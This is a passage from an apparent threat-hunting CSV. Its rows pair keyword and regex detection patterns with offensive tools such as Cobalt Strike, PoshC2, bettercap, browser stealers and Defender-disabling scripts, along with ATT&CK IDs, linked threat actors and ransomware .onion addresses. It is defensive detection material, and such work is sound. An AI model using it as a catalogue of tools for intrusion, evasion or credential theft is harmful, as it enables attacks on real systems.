Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","41136" "*dllproxy.py*",".{0,1000}dllproxy\.py.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","N/A","1","17","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z","41137" "*DllProxy-main*",".{0,1000}DllProxy\-main.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","N/A","1","17","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z","41138" "*dllsearcher *.dll*",".{0,1000}dllsearcher\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","41139" "*-dll-sideload=*.dll*",".{0,1000}\-dll\-sideload\=.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense 
Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","41140" "*DLL-Spoofer-main*",".{0,1000}DLL\-Spoofer\-main.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","1","N/A","N/A","9","1","60","7","2025-03-04T14:14:15Z","2023-10-18T14:34:38Z","41141" "*dlyo7r3n4qy5fzv4645nddjwarj7wjdd6wzckomcyc7akskkxp4glcad.onion*",".{0,1000}dlyo7r3n4qy5fzv4645nddjwarj7wjdd6wzckomcyc7akskkxp4glcad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","41142" "*dmcxblue/SharpBlackout*",".{0,1000}dmcxblue\/SharpBlackout.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","41143" "*dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE*",".{0,1000}dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","N/A","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","41144" "*dmg2john.py*",".{0,1000}dmg2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","41145" "*dmluY2VudC5sZXRvdXhAZ21haWwuY29t*",".{0,1000}dmluY2VudC5sZXRvdXhAZ21haWwuY29t.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","41146" "*dmluY2VudC5sZXRvdXhAZ21haWwuY29t*",".{0,1000}dmluY2VudC5sZXRvdXhAZ21haWwuY29t.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","41147" "*dnefedniw eteled cs*",".{0,1000}dnefedniw\s\seteled\scs.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","41149" 
"*DNet-EnumerateAllDomainUserAccounts*",".{0,1000}DNet\-EnumerateAllDomainUserAccounts.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","41151" "*DNet-ListAccountsByDescription*",".{0,1000}DNet\-ListAccountsByDescription.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","41152" "*DNet-ListDomainUserAccountsWithCompletedADDescription*",".{0,1000}DNet\-ListDomainUserAccountsWithCompletedADDescription.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","41153" "*DNet-ListUsersInDomainAdminsGroup*",".{0,1000}DNet\-ListUsersInDomainAdminsGroup.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","41154" "*dnf install tor -y*",".{0,1000}dnf\sinstall\stor\s\-y.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","41157" "*dngmlblcodfobpdpecaadgfbcggfjfnm*",".{0,1000}dngmlblcodfobpdpecaadgfbcggfjfnm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","41158" "*dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion*",".{0,1000}dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","41159" "*DNS retrieval done - converting to file*",".{0,1000}DNS\sretrieval\sdone\s\-\sconverting\sto\sfile.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","41160" "*dns.lexfo.fr*",".{0,1000}dns\.lexfo\.fr.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","41161" 
"*dns.msfncsi.com*",".{0,1000}dns\.msfncsi\.com.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","41162" "*dns.spoof on*",".{0,1000}dns\.spoof\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","41163" "*dns.spoof.address*",".{0,1000}dns\.spoof\.address.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","41164" "*dns.spoof.all*",".{0,1000}dns\.spoof\.all.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","41165" "*dns.spoof.domains*",".{0,1000}dns\.spoof\.domains.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","41166" "*dns.spoof.hosts*",".{0,1000}dns\.spoof\.hosts.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","41167" "*dns_beacon_beacon*",".{0,1000}dns_beacon_beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 
- T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41168" "*dns_beacon_dns_idle*",".{0,1000}dns_beacon_dns_idle.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera 
- Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41169" "*dns_beacon_dns_sleep*",".{0,1000}dns_beacon_dns_sleep.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41170" "*dns_beacon_dns_stager_prepend*",".{0,1000}dns_beacon_dns_stager_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41171" "*dns_beacon_dns_stager_subhost*",".{0,1000}dns_beacon_dns_stager_subhost.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41172" "*dns_beacon_dns_ttl*",".{0,1000}dns_beacon_dns_ttl.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike 
random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41173" "*dns_beacon_get_A*",".{0,1000}dns_beacon_get_A.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41174" "*dns_beacon_get_TXT*",".{0,1000}dns_beacon_get_TXT.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41175" "*dns_beacon_maxdns*",".{0,1000}dns_beacon_maxdns.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 